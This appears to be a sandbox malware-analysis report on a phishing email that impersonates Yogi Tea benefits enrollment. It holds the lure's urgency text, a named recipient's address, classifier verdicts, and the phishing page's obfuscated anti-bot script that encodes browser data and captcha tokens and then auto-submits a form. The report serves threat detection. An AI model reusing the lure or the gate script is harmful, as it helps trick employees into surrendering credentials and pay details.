| URL: email Model: Joe Sandbox AI | {
"explanation": [
"Multiple suspicious HTML attachments related to sensitive financial/benefits information",
"Generic subject line and minimal email body content is suspicious",
"Benefits enrollment emails typically come from HR or benefits providers, not generic company email"
],
"phishing": true,
"confidence": 9,
"generated_by_ai": false
} |
{
"date": "Saturday-December-2024 15:20 PM",
"subject": "Yogi Tea Open Benefit eligible for lindsey.johnson",
"communications": [
"\n[cid:image001.png@01D9AD87.FE3310D0]\nIT Operations Manager\n\n\n\n\n\n"
],
"from": "Yogi Tea <Yogiproducts@yogiproducts.com>",
"to": "lindsey.johnson@yogiproducts.com",
"attachements": [
"Eligible Finance Insurance Benefits Open Enrollment Plan.html",
"Health Insurance Benefits Open Enrollment Plan.html",
"Yogi Tea Life Insurance Benefits Open Enrollment Plan.html",
"Yogi Tea FSA Benefits Enrollment Plan.html",
"Yogi Tea 401k Enrollment Plan.html"
]
} |
| URL: Email Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: Email Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
| URL: Email Model: Joe Sandbox AI | {"classification":"Payroll Fraud"} |
Email:
Detected potential phishing email: Multiple suspicious HTML attachments related to sensitive financial/benefits information. Generic subject line and minimal email body content is suspicious. Benefits enrollment emails typically come from HR or benefits providers, not generic company email |
| URL: https://login.itpishro.com/vmiddle9999... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While some of the behaviors may be related to legitimate functionality, such as browser detection and CAPTCHA handling, the overall complexity and lack of transparency raise significant security concerns."
} |
history.replaceState({},"","/");
(function (_0x2b8318, _0x263e16) {
var _0x41b7ab = _0x10f1, _0x1397c9 = _0x2b8318();
while (!![]) {
try {
var _0x56aa45 = parseInt(_0x41b7ab(0x1d8)) / 0x1 + -parseInt(_0x41b7ab(0x1d1)) / 0x2 * (-parseInt(_0x41b7ab(0x1d4)) / 0x3) + parseInt(_0x41b7ab(0x1ce)) / 0x4 + -parseInt(_0x41b7ab(0x1d0)) / 0x5 + -parseInt(_0x41b7ab(0x1d2)) / 0x6 + parseInt(_0x41b7ab(0x1d5)) / 0x7 * (parseInt(_0x41b7ab(0x1cf)) / 0x8) + -parseInt(_0x41b7ab(0x1d7)) / 0x9;
if (_0x56aa45 === _0x263e16)
break;
else
_0x1397c9['push'](_0x1397c9['shift']());
} catch (_0x4bf6eb) {
_0x1397c9['push'](_0x1397c9['shift']());
}
}
}(_0x83b1, 0x37b68));
function _0x74739(_0x1c737b) {
var _0xe2ac07 = _0x10f1, _0x41fa4e = '';
for (var _0x859b98 = 0x0; _0x859b98 < _0x1c737b[_0xe2ac07(0x1d3)]; _0x859b98++) {
_0x41fa4e += '' + _0x1c737b['charCodeAt'](_0x859b98)[_0xe2ac07(0x1d6)](0x10);
}
return _0x41fa4e;
}
function _0x10f1(_0x1774c9, _0x33db3a) {
var _0x83b16f = _0x83b1();
return _0x10f1 = function (_0x10f12d, _0x1f2413) {
_0x10f12d = _0x10f12d - 0x1ce;
var _0x2cd561 = _0x83b16f[_0x10f12d];
return _0x2cd561;
}, _0x10f1(_0x1774c9, _0x33db3a);
}
function _0x83b1() {
var _0x868a6c = [
'10344HVpkDN',
'1802055NkIvet',
'107612iBMkFH',
'1466220eCvEHF',
'length',
'18umtuTH',
'987DihKGv',
'toString',
'4036734cyjByR',
'360792nEGbWg',
'1662264AFuwvD'
];
_0x83b1 = function () {
return _0x868a6c;
};
return _0x83b1();
}
var result = bowser.getParser(window.navigator.userAgent);
document.getElementById("bValue").value = _0x74739(result.parsedResult.browser.name)
document.getElementById("pValue").value = _0x74739(result.parsedResult.platform.type)
grecaptcha.ready(function() {
// do request for recaptcha token
// response is promise with passed token
grecaptcha.execute('6LfRF5kqAAAAAAuW2dANii_JwRF95-vsYuOAqHr0', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = _0x74739(token);
});
});
window.onloadTurnstileCallback = function () {
turnstile.render('#igp', {
sitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
callback: function(token) {
document.getElementById('cCapt').value = _0x74739(token);
setTimeout(() => {
document.getElementById("subAct").submit();
},5000);
},
});
};
//document.getElementById("subAct").submit();
|
| URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Click the link below to access your personalized open enrollment information for your completion.",
"prominent_button_name": "Complete your Open Enrollment Form",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Click the link below to access your personalized open enrollment information for your completion.",
"prominent_button_name": "Complete your Open Enrollment Form",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
| URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
| URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
| URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have a legitimate purpose, such as reCAPTCHA integration, the use of techniques like the `Function` constructor and encoded strings raises significant security concerns. Further investigation is warranted to determine the true nature and intent of this script."
} |
recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9Gc2FOSVl5UE43Nmkwc0w3ZDNteUlvRmZqTURBdzhlSGM5QUp1TFVybTdBLmpz\x22,\x22\x22,\x22QlVaY3dwbW1sMVczTzdNQjB1WUFSRHk5ZWQ5YThpOEx3ZFNXckhJcFgrd0poZUYyUXk2SG0rRGNtb3cxRWdkelFTVkZKUUxLWkdMeWN2Q283cVdYZEJ0ZWtGL3RiM3B4czBMZFRzaUI3dnhGS3hGRUwxLysxUlpWL3FwMmo4NjB6b0ordld6R1oyUS9BR1pZU1QzZDZhNFRKUVY0RkJIaFBjc2ExZjdQV01EYW96b2JCNHhYKzVwdzZjdG81ZlNBZW9BRE5WTkhqRUNHaTQ0ZGxlM09aUzFjUVcvRXNGbFlPUnM0WjdqN3h6Z2xFRzRzQ1VzT21GVmkwMW5rSnhaRmtZK2hzaWhCQzBzQlRRNHhrVUJNcStRN1BMaDZXRUZnZDV1U0VlL0ZJOFFUSkdtS0l5OW1HbkV0TnJMa1J2aWtwV1MyM0lKVFNsbXdUQ2piY0hORlBRSnlSeTRqaVlaUktVck56bVJGcXlGdFEwbmVWbWdLNFZFSzJmeVpKMkpkemhxRHZZSUo2cEtSRHhTbEUxV3dPRyt1dW9sSEZvZzhaWWVMbGZKWTlyWHhCeFlZd0hOK0JtZ0ZGaGhFQkN5aXkrcFhxeHRzb2drK2FMRXltOUpnTlpXU2pBUXJBYkdaU0VTV1ZTU1pzQVBaSHljNis3VW1YTEQxblZRcmZuWkxXRGd0d0FMK0oybE8zU1JhdEZCVm5WdUJPZDdjZ3ltQ0RDelNEbHdrekdKeXF4c0R0MWlnaW43OFk4Q3FIOFlEdFNFeVYzTUV1Ni9hVFh0TERZek1WbmVjTXNMbFZac0RrTDBKRGg1V3c5SXYydW42K1J4VS9mN0luZWQyclNrVlA4QUNkMnNwaERhSkJhWnlkUTYweHpiK2kzK1c0Q0J1bE5zN24wdDlpZ0ZvWit2bTRMckxWazlHUzlXelIwSElNckhSMG9xdmdQazlBNlZ2dHVyWDUxeHViVVpXY3BBWlJUcjJDUitBZmFYSSt2b3JpcXNVVWRVUUZSb3JodWdFOFV2SXhoaGNhbGlob2I5WWVEYUpsWXdodjFGNFJINkVmNXBhWE02OUlaTGc0QUFWM1ozYyttZG1XSlh4KzZPL3VDZFYybFhjVkt5WldvM29QZThETlBiMVZZd3UyZVN6Q21KV3Y5SWZoQ2ZjdFFnVmo4MGpycC9aVW5mUXdPUGtaQUJxRnhrbVVNZXNtRW9MSU1SVjFSTTZPYlVhRFhUWDFjMDB6V1IzczNGUGJHUHIwYjVac29OVnpNK2l6c0JKNnhWdTNUT1FBcTdXNE4yTUtHZVZHQVp2aTJuNUxiNG9HMmJUYnJzaGVEcU1sWERyeFRFVEZyOWo3QmZuSytKeWhSaDkzWkhxZHlTUm9lSUpNaEpPMmp4Q1JMdkFNUnRHNnFRVzhiSWFyTGpwQ3d0NStwUkdZa3FscTVMNXNXYmNReVRaM3cxVlB5ZlJtUExycUU4MkoxbWhzL0Vya2t4c1E5VHVPNnBnaHJteTlsQlpEQ1pZWXJ6dHhCb3JhbDJzbDBtNHlSaWxCZFhtMVpDeTJ6ZWh0bHNtdjdtRis4dE9WYW9UY0dicDAwdnprZnhqRGVJZG9vbnFYZ1pES0RYV1MrL3drSUdpcVROZGtSa0l6RnFNdHpaMjEvYzNDOTRkdDlCSVZlNTdoL0JEeVJuazUrOEFQOWxUU21Ka1Q2YVFaU3pFM2dHcnpUdlBxbDVVcmZoUnZob1l1eDFJU1NXMHdtTWVQTkd5NStzWkZDSllRaGt1NG1UWThnN1Yxd1BKc3VOMnB6dTQwSVVTWUVvUGRSS29MR2tlUHMrcUxGMlFiS2V0cGVEQjdjSkZTVVI2cGNBYk93WHdEaXMwUlk4UFZNdjRjSzR1V2FtZ1RWTG43bzNzSTdQUWpEOUYrMGFPSTVtOGdoUnF2THFoWWZvbGlJRDVYdDlIbWxOSDhmYkk0ZG4zbGhGRzBGWGx3RHVuY1FqS1VHa2ZwOXJFM2VTVlYyUXZoMkdDb25SQTE5cVJ2dE83VmlwcWthbG5DTC9YaTloY0FpS0NPdEk2SWZGa2Q2djN4OHFQL1FiZlpReTBaNFBLZURIZWJTVXYwbDBTK2wrVFRhSjlsRXI1bFVab3V2N2xaQnczSlVpekxWR2hML253OXFJd3QwaG9QNTV5NGROTEhQdXIzam9WN0ZDUXpsSWsrdmNNWVZJZFlrci9aQmZHZ2RUcGd6dDd0SlBoN0JRbEFyWFliRldNTWNtK2RlU3dZZTFBY0Y4VnI1R3lvMjdUeG9DQzVPWmY2cVJpa2hYWUVjS1RWQUE4NW5mdWY4enFBY0VXbkFNek16ZVZWU3h6VU1VcjJ0WkpmNGZqMVI0SUlKbUdhVHNIYkVieDV3NVo0QjE1aDFxdnFzM2QzQXRFTWFMNCtUTDA2TTF1UVZSZTE1OTl2aERod3J6Y2phcXRuTlRZL2VpbVQzWm5NYmNWWjFlMDdaalJmR1N4ZDNyRG91eGc4cXpWQnpSRzFWMklGalJKSG9TWVVuZUtBMmVNc3pyYUozMFdKQnhsN3JHOGdUK2ZNUi80V1ExM0VmK0x2Wk11TE80aDh5VTFaYjY0dS9oc1Byb2dScGp2QllUa1FjaFRmRjFhK2wxbmFLSzNyMjNwYXpPMmx3NVZnQ2twYnBWbjVzT212MzMvRm15NEtmRGZPUUNoSnpob0lMSlVJL0ZGejhtTEpXajhZSTFBb2lzbWJVckhFOVdFcHdSMDFtOVF1MUVkbHVXUU05bm1ueFY1OHdHTjVRc2ZYZWxxcktEUmpYQ1FKWlhXc09IU3ZJRlhVWHFqMk93N2ZUMFhDeCtYWHNRYllhK3poUkdUa3FmdDJjNWR5R01wMHcvams1bExRTmlJZ2RnRlVvV210SHZYRjgxZGkxQ0ZXY0djemhwRXh2MmxzbjZGWU9rTk01NG90bGppK1VDYmNyWlpzVUlZRXF0WFdXbk8rVzJIWFJMejNVYUFMUnI4eVZTZWZYN1dHL3F2RmlLVys5RHFlVS9LY01yTjRTcWR0OG1OSVFUNWxNd0Z5U1REeW10Q05Mcm1KeDhQaTgxQWQ3eld3UUJTQVA1bVhXbmpId1BrVE5xSmlyN2Y5bjhjaVB5MDhWaVdpbnFocXFUa3VYelViSEdkSjZCV2Y2SENvY0JEb2gvdmdNWTl1K0EwY3dPbzlOeVB2bkhSN3ByTVBxZldGYzMweVMyN09JV01mQ2UwOTZaVHN2WjBTRmFadVJIYTRFbkR1SHJUT2NuTm9JQmJUdWJ4N2VKUlNneWlCeXRyNEJSVVRmTDNZK0UxdjhUdHc2eXZuejNnVHdGU3Z2ZnZlL05HRDhUamlpOWVKRzV1eG5CeGhGTzJmdWZaUUdrYzFmY0N2RFlKSnpiQ1RpUDcwUk13NXdnUEUyOGRzdmZ6U3QxV0tnOFhHQUFtQjdpcFhNUnZoMzU0RDF5cE9VcTEvVU85MmphZ0JVOVRIamVHUVZ3NTdyMDJQazVuakxTTThDdDl6NVFxd2NDdzdVbUZlWHVpTGtDUUVFK2Nvb2pSTWNYOVRIVjBYb2VZMi9YOXp3RXBCazFkMTAwNGhadm5Xb3l0WktoQTl4bkM0YWs4c2NmRFlTVXJTQUNMTmFYVXFZK0NJaWt6UVFocmg1YkJqYXJqU05UREVkYkUzazdLWTAxejhxR01ocnBoZ0V0WTErZEs5ZUc5eVFMZFNTODlQRndzSEJQaElyS1c5dFgxNDNvd3FjVnh0NE5NbVRYMVhsRDBubGROQ082bEpmbHdnOXFtT1VhRjliSGRLWjd |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window, which is a common pattern for these types of challenges. While the script uses some techniques like message passing and dynamic configuration, these are typical for Cloudflare's managed challenge system and do not indicate any malicious intent. Overall, the script seems to be a benign implementation of Cloudflare's challenge functionality."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '6oyz2',
chlApiSitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'JZVX9MRjvpVAa1PPqdgCWcB4bDOQVxsash.HSVKAnCc-1734376424-1.3.1.1-AeWOefW83fjeIutWNOgkSSbR9dCBtdf8vf_BtY1lzuE',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f30fe0c18624249',
cH: 'JzTx41TNy8THgG9aQzBr6QRUMpU0y00S9MJ_h2PRdwE-1734376424-1.1.1.1-s7MbRb_Q9mUnG7DTJynMLr3Fl5p.Gj2cblTHIYRqmCa7rEIRSH8PH4hupHI7ZeHJ',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: '4fWI.nasxo6LLlux73.p9g75deeYd2S0l.xayfA2KGQ-1734376424-1.1.1.1-2_d8DLYq1m7r6PPeVIl6AmpWtk0wapjYmo6tmYYj4qVmKYDctsnJTF7zHZJ_YVJe42VALqyBAQNICbaPkAlAMfoay3je5yKALYWbK5SPY0ESkc8ZWbfhbebOqd1L09NUfVc94PxtrXE9U18PQeCaatKaJWtQNGfhOkZ4t5Pym_w.BLePHLa4tm1RsZVuoLlR4KDAy5QvlUt5HsTcrPIlVnejsCIjC4EtLb0YVO7yFgASLzhASDYLsBr7wgThq.5l9Ti38rW0u_qZ7Einm5DKjqcVtWn.BB0g4r_N1_6DhtGXhJzJGBItQQ4MDjfHq8Dkk4fboftINiT2PRvsFG_RK.G_HH2SWQPB1cFYrrVBRlXuMLc_ZH9PY_IiKu4BjkWOWaQxwYXkLTIz0jyptdpy_mGw263RTIJg8kRXen.PjeYsKTMpRx_idt3aJNMSoiKwaa4ZcW2kzDpKm0GuulKXDO_0zB2U7sHSyTLiwxcQt4PuT20DNs.k2.WDkBeoeertpZFSMub0AJpsDwVg6JbBAGt9B1TSs_dB_ZEhVRyzzwPjAfnepNF5gJucpP2LQJWITt0T_O0KCVrj49mXv.i9t8YZjyYYhfXBDAd4H3RWnI1xqqJcBvqDPjAjG0xcg6i24F58R4cs8fcVlUdUY_mafjCv5CrL27zaVVuE.OxNlEiMiwPqETvXYmZKJl4.8bsedTmIh.406WWaVCdOipJyngD8Vb4yAMcMkbGAiw5omkp0XSg3MZkzDTmgMorl6X2_UAzK9afv9vinomPxwlduvY1025nwPb5tGefBVNkl1nJBgM9t5CL1htJcr6HyhGMxStweieSTbMn5_EYC7KR4jzFy50s.pcw8bzZnURnfiCMG4LkZUA_mCr1JINcHy83F7DvDZ_RmVLWgZiM_jWxMzd_XXGpg6GHZnSrX16QKoXJAkQEWpspm1vS4H7_6Dg.8wTx4Rs7rrco4WYZJxD1cJvvLBykAdVorT4hPslJbBkSy5joqW9mKCceomZMpCs209OQ_lTrPk1sEdvQ5.UMVzaGy6Xy7w28zMsE97lpEzo_w8fwdL.U_W5z52hSAjf7QjjBi9fOD.SbOqEb5hUGfyWv.G5O.BIsLO9AUscrqLDPqhJS61lPRfN_8UsbILtf8v_1lZJxLlgXYxBsLIUacjYlfEBdYcSAUD8LO1GKzKELK42Wl5bUlPnKWR60DCEVXbroZT273IfKupNaOXxiP5ex3JvhPMSsODkR1mVPcTY24uVLqFYpfAK8DQCZ1s61AVGBzoY7FyEjtGFHuTwO0Aeb1EeSebx0U0gglTmKaJ1etQgi96BSzKrm__MCscrL_sOrHw9Q.8ut6stDu.z8jrt1XFDZ_xNnXI_y6_Efxa2ym8hrezTeRIawhfws.RivDhowbQ6MYgcxG9owX.KKWKw',
cITimeS: '1734376424',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '6oyz2',
nextRcV: 'JZVX9MRjvpVAa1PPqdgCWcB4bDOQVxsash.HSVKAnCc-1734376424-1.3.1.1-AeWOefW83fjeIutWNOgkSSbR9dCBtdf8vf_BtY1lzuE',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://www.google.com/js/bg/FsaNIYyPN76i0sL7d3myI... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a minified and obfuscated code, which makes it difficult to analyze. However, based on the observed behaviors, it does not seem to contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code appears to be related to some form of analytics or telemetry functionality, which is a relatively low-risk activity. While the use of legacy APIs like `XDomainRequest` and aggressive DOM manipulation are present, these are considered low-risk indicators. Overall, the risk score is assessed as 3, indicating a low-risk script that may require further review but does not demonstrate clear malicious intent."
} |
/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var E=this||self,e=function(q,b){if(b=(q=null,E).trustedTypes,!b||!b.createPolicy)return q;try{q=b.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(v){E.console&&E.console.error(v.message)}return q},T=function(q){return q};(0,eval)(function(q,b){return(b=e())&&q.eval(b.createScript("1"))===1?function(v){return b.createScript(v)}:function(v){return""+v}}(E)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',
'',
' Copyright Google LLC',
' SPDX-License-Identifier: Apache-2.0',
'*/',
'var S=function(b,q,v,T,e,G,d,c){if(!q.uF&&(d=void 0,v&&v[0]===O&&(b=v[1],d=v[2],v=void 0),G=l(q,354),G.length==0&&(e=l(q,416)>>3,G.push(b,e>>8&255,e&255),d!=void 0&&G.push(d&255)),b="",v&&(v.message&&(b+=v.message),v.stack&&(b+=":"+v.stack)),v=l(q,28),v[0]>3)){q.C=(v=(v[0]-=(b=b.slice(0,(v[0]|0)-3),(b.length|0)+3),b=qE(b),q.C),q);try{q.H8?(T=(T=l(q,462))&&T[T.length-1]||95,(c=l(q,33))&&c[c.length-1]==T||H([T&255],q,33)):H([95],q,462),H(g(2,b.length).concat(b),q,258,9)}finally{q.C=v}}},Ep=function(b,q,v,T,e){function G(){}return{invoke:function(d,c,P,E){function Y(){v(function(f){v9(function(){d(f)})},P)}if(!c)return c=e(P),d&&d(c),c;v?Y():(E=G,G=function(){v9((E(),Y))})},pe:(T=(e=(b=b9(b,function(d){G&&(q&&v9(q),v=d,G(),G=void 0)},(v=void 0,!!q)),b[0]),b[1]),function(d){T&&T(d)})}},TC=function(b,q){function v(){this.S=(this.n=0,[])}return[function(T){b.G6(T),q.G6(T)},(q=new (v.prototype.E_=(v.prototype.G6=function(T,e){this.S.length<(this.n++,50)?this.S.push(T):(e=Math.floor(Math.random()*this.n),e<50&&(this.S[e]=T))},function(){if(this.n===0)return[0,0];return[(this.S.sort(function(T,e){return T-e}),this.n),this.S[this.S.length>>1]]}),b=new v,v),function(T){return q=(T=b.E_().concat(q.E_()),new v),T})]},Z,YY=function(b){return b},f4=function(b,q){return b[q]<<24|b[(q|0)+1]<<16|b[(q|0)+2]<<8|b[(q|0)+3]},W=function(b,q,v,T,e,G){if(b.Z.length){b.mR=(b.g=!(b.g&&":TQR:TQR:"(),0),v);try{e=b.X(),b.U=e,b.A=0,b.O=0,b.v=e,T=GC(v,b),q=q?0:10,G=b.X()-b.v,b.e6+=G,b.Z2&&b.Z2(G-b.u,b.N,b.L,b.O),b.u=0,b.L=false,b.N=false,G<q||b.W8--<=0||(G=Math.floor(G),b.CU.push(G<=254?G:254))}finally{b.g=false}return T}},NE=function(b,q){return X[q](X.prototype,{floor:b,propertyIsEnumerable:b,parent:b,replace:b,pop:b,console:b,splice:b,call:b,stack:b,document:b,prototype:b,length:b})},a=this||self,J=function(b,q,v){if(b==246||b==416)q.I[b]?q.I[b].concat(v):q.I[b]=Op(v,q);else{if(q.uF&&b!=278)return;b==214||b==258||b==454||b==290||b==354||b==462||b==33||b==172||b==221||b==28?q.I[b]||(q.I[b]=QP(v,86,b,q)):q.I[b]=QP(v,105,b,q)}b==278&&(q.Y=w(false,q,32),q.J=void 0)},z=function(b,q,v,T,e,G,d){d=this;try{l9(G,this,e,v,q,T,b)}catch(c){t(c,this),T(function(P){P(d.H)})}},l=function(b,q){if(b=b.I[q],b===void 0)throw[O,30,q];if(b.value)return b.create();return b.create(q*5*q+-18*q+86),b.prototype},Sk=function(b,q,v,T,e){if(e=b[0],e==c9)q.L=true,q.W8=25,q.i(b);else if(e==D){T=b[1];try{v=q.H||q.i(b)}catch(G){t(G,q),v=q.H}b=q.X(),T(v),q.u+=q.X()-b}else if(e==Ay)b[3]&&(q.N=true),b[4]&&(q.L=true),q.i(b);else if(e==H9)q.N=true,q.i(b);else if(e==P9){try{for(v=0;v<q.s.length;v++)try{T=q.s[v],T[0][T[1]](T[2])}catch(G){}}catch(G){}((0,b[1])(function(G,d){q.IF(G,true,d)},(q.s=[],v=q.X(),function(G){n([go],(G=!q.Z.length,q)),G&&W(q,false,true)}),function(G){return q.Xh(G)},function(G,d){return q.t9(G,d)}),q).u+=q.X()-v}else{if(e==hy)return v=b[2],J(461,q,b[6]),J(6,q,v),q.i(b);e==go?(q.I=null,q.T=[],q.CU=[]):e==yP&&a.document.readyState==="loading"&&(q.K=function(G,d){function c(){d||(d=true,G())}(a.document.addEventListener("DOMContentLoaded",c,(d=false,F)),a).addEventListener("load",c,F)})}},w=function(b,q,v,T,e,G,d,c,P,E,Y,f,N,Q){if((c=l(q,246),c)>=q.D)throw[O,31];for(f=(Q=v,(T=0,q.c8).length),E=c;Q>0;)Y=E>>3,e=E%8,d=q.T[Y],N=8-(e|0),N=N<Q?N:Q,b&&(G=q,G.J!=E>>6&&(G.J=E>>6,P=l(G,278),G.P8=Zs(G.J,G.Y,[0,0,P[1],P[2]])),d^=q.P8[Y&f]),T|=(d>>8-(e|0)-(N|0)&(1<<N)-1)<<(Q|0)-(N|0) |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the Cloudflare challenge UI and translations, which is a legitimate use case. While the script uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a standard Cloudflare challenge implementation and does not raise significant security concerns."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only":"Testing%20only.","turnstile_failure":"Error","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","turnstile_feedback_description":"Send%20Feedback","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_success":"Success%21","turnstile_refresh":"Refresh","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_terms":"Terms","turnstile_verifying":"Verifying..."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fj,fm,fo,fp,fq,fC,fO,fU,fV,fW,g6,gh,gl,gv,gz,gA,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1600))/1+-parseInt(gI(438))/2*(-parseInt(gI(1132))/3)+parseInt(gI(872))/4*(-parseInt(gI(642))/5)+parseInt(gI(1416))/6*(parseInt(gI(1310))/7)+parseInt(gI(1673))/8*(parseInt(gI(1335))/9)+parseInt(gI(1835))/10*(-parseInt(gI(925))/11)+parseInt(gI(1628))/12*(-parseInt(gI(1309))/13),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,402277),eM=this||self,eN=eM[gJ(756)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(1085)](eP),eP++);eQ=(0,eval)(gJ(688)),eR=atob(gJ(656)),eM[gJ(626)]=function(hk,d,e,f,g){hk=gJ,d={},d[hk(1274)]=hk(525),d[hk(549)]=hk(1476),d[hk(796)]=hk(919),d[hk(1746)]=function(h,i){return 